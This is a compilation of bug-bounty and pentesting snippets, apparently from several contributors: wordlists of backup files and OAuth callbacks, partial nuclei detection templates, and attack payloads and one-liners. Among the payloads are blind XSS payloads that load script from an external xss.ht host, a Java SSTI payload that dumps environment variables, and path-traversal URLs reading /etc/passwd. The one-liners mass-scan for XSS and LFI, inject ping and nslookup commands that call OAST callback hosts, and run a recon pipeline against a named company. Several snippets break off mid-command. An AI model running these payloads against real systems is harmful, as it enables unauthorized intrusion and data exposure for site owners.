Sachinart

/index.php.bak
/backup.bak
/index.aspx.bak
/Index.aspx.bak
/Download.aspx.bak
/search.php.bak
/wordpress-db.php.bak
/db.php.bak
/phpinfo.php
/info.php

kannthu

id: swagger-ui

info:
  name: Swagger UI
  author: vidocsecurity
  severity: low
  description: Swagger UI exposes information about endpoints and sometimes it is vulnerable tu XSS
  tags: swagger-ui,exposure

requests:

Huntinex

"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')

kavishkagihan

• Typically java ssti payloads start with $. But if that character is banned you can use * instead of that.

• Get env vars

*{T(java.lang.System).getenv()}

• Read files (/etc/passwd)

GuanacoDevs

[
  "/ui/vropspluginui/rest/services/getstatus",
  "/ghost/preview",
  "/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page",
  "/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
  "/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
  "/log_download.cgi?type=../../etc/passwd",
  "/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
  "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
  "/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00",

0x3n0

assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
 
assetfinder https://exmple.com | gau --subs https://exmple.com  | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
  
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
  
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H 

m4ll0k

/plaid/mobile/oauth_callback
/callback
/oauth2/idpresponse
/signin-google
/twitter_oauth_signin
/soundcloud_oauth_signin
/23andme_oauth_signin
/500px_oauth_signin
/agave_oauth_signin
/amazon_oauth_signin

z3r0-0t

id: CVE-2022-30525-initial-detect

info:
  name: Zyxel Unauthenticated Remote Command Injection
  author: z3r00t
  severity: info
  tags: CVE-2022-30525,Zyxel RCE

requests:
  - method: GET

righettod

id: CVE-2022-21449

info:
  name: CVE-2022-21449 test exposure
  description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place.
  author: righettod
  severity: info
  tags: cve,2022,java
  reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java

nullenc0de

curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt

subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3  |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt